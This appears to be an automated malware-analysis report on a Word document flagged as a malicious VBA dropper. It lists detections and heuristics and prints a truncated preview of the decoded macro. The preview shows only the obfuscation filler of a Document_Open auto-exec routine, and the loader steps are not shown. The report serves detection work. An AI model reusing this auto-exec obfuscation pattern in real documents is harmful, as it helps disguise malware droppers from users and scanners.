MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing a malicious VBA macro. The macro is obfuscated and uses the Document_Open auto-execution event. It contains critical heuristics for Shell() calls and an obfuscated auto-exec loader, indicating it is designed to download and execute a second-stage payload. ClamAV also detected it as Doc.Malware.Chronos-6897935-0.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38346 bytes |
SHA-256: 8b86a6bdea471886e6d9c261f2a80164006635f6a2f100bac9590600f7c2ba0c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fkelbskfbse() As Integer
fljkeb = "328198"
fbebl = 3113 - 434
fkelbskfbse = fbebl - 100
End Function
Private Sub Document_Open()
fbjlz = fkelbskfbse()
For WCAiQ = 0 To 43
wAHD = StrReverse("AhQYazmKTMAmYIlgB")
wAHD = StrReverse("UfjdrVWkKpx")
wAHD = StrReverse("kSCJKPTUIOEyh")
wAHD = Replace("eETiUOrfLyL", "eET", "WsVo")
wAHD = StrReverse("fsOLEgKzmpzMUVUxscE")
If 2460080 = 251 - 1030 Then
WZQFk = Replace("yLpJOkMkJuDioloOyR", "yLp", "UBdQ")
WZQFk = StrReverse("yLpJOkMkJuDioloOyR")
End If
wAHD = StrReverse("ajovTqhBwihlT")
wAHD = StrReverse("HHATwKBzGpXvJk")
wAHD = StrReverse("iVniFinWKjgizXfl")
wAHD = Replace("fAEIaQdhLYkpHnauo", "fAE", "hIuQ")
wAHD = StrReverse("JeXHjuyaoDgZnwXZPg")
If 914079 = 123 - 5968 Then
gGHdv = Replace("DoltaeVorYyRq", "Dol", "oAdvb")
gGHdv = StrReverse("DoltaeVorYyRq")
rKfOt = Replace("wklGwScLbh", "wkl", "rXckatj")
rKfOt = StrReverse("wklGwScLbh")
End If
wAHD = Replace("GRCyPUfbll", "GRC", "mpDEORX")
wAHD = Replace("BpqHYpYOQuTxsrE", "Bpq", "lOXMB")
wAHD = Replace("fYEfRPhzBcYE", "fYEf", "LtuGLDp")
wAHD = StrReverse("hMhglFXgXLZoAAABF")
wAHD = Replace("CwxoSETPfHo", "Cwxo", "dOpCkJ")
wAHD = StrReverse("ZRaVPcAiwhm")
wAHD = Replace("iLJngfexTayQTGLOloV", "iLJn", "QcdPTz")
If 617267 = 101 - 7641 Then
VsTQR = Replace("JSMfotHPmyPDIwUS", "JSM", "EkJoVfV")
VsTQR = StrReverse("JSMfotHPmyPDIwUS")
End If
wAHD = Replace("fcyLqpennbdgRxcHufF", "fcyL", "xUrlR")
wAHD = StrReverse("UyqriZSgGhaitQ")
wAHD = Replace("ekJvQPBXLGw", "ekJv", "BKejq")
If 991289 = 53 - 2878 Then
xgaUw = Replace("dKaoXSTwLtl", "dKao", "OGcUo")
xgaUw = StrReverse("dKaoXSTwLtl")
End If
wAHD = StrReverse("somGOJzXdbUeGDIgrEY")
Next WCAiQ
If 1659259 = 41 - 3507 Then
MAxcw = Replace("BUzotIEcbHv", "BUz", "yAFOUfO")
MAxcw = StrReverse("BUzotIEcbHv")
afdAl = Replace("xoXgQQHHgXohL", "xoXg", "aCMK")
afdAl = StrReverse("xoXgQQHHgXohL")
End If
qzozUa = StrReverse("sGnDcfwsqwa")
If 2929590 = 135 - 4290 Then
CObTT = Replace("uijpvcMQsZHTh", "uijp", "ZFiLk")
CObTT = StrReverse("uijpvcMQsZHTh")
End If
For nGlQZ = 0 To 182
If 525399 = 51 - 5529 Then
bOrQe = Replace("dWEPHfiMTK", "dWE", "Hptmm")
bOrQe = StrReverse("dWEPHfiMTK")
pwrxZ = Replace("yXXTCgOBHPuneEAEdhW", "yXXT", "qCtWPq")
pwrxZ = StrReverse("yXXTCgOBHPuneEAEdhW")
End If
Egas = StrReverse("WruLHlQERCDGayY")
Egas = StrReverse("OXjsXmWDDreuIFJacAK")
Egas = StrReverse("YrpCihKhVEvVb")
Egas = Replace("fnFGTulUXGCUDb", "fnF", "qGPXR")
If 1023309 = 164 - 4472 Then
QXYzO = Replace("OFoyXyODkpfJxRbMQ", "OFoy", "wFXMfIk")
QXYzO = StrReverse("OFoyXyODkpfJxRbMQ")
End If
Egas = StrReverse("lWALjdrxRErlA")
Egas = StrReverse("clHckpiKsISvunkoKUG")
Egas = StrReverse("CLRGskVgPJbHDiG")
Egas = Replace("qVksszdQke", "qVks", "pnrT")
Egas = Replace("pAnTkifLfSiHbTXtHZ", "pAnT", "WslHhdK")
If 30307 = 5 - 165 Then
nDtRK = Replace("HBKDEVkOyXkqs", "HBK", "Jrcji")
nDtRK = StrReverse("HBKDEVkOyXkqs")
End If
Egas = StrReverse("EQpqyCnoIO")
Egas = StrReverse("hUHEgLOzlKPqMv")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.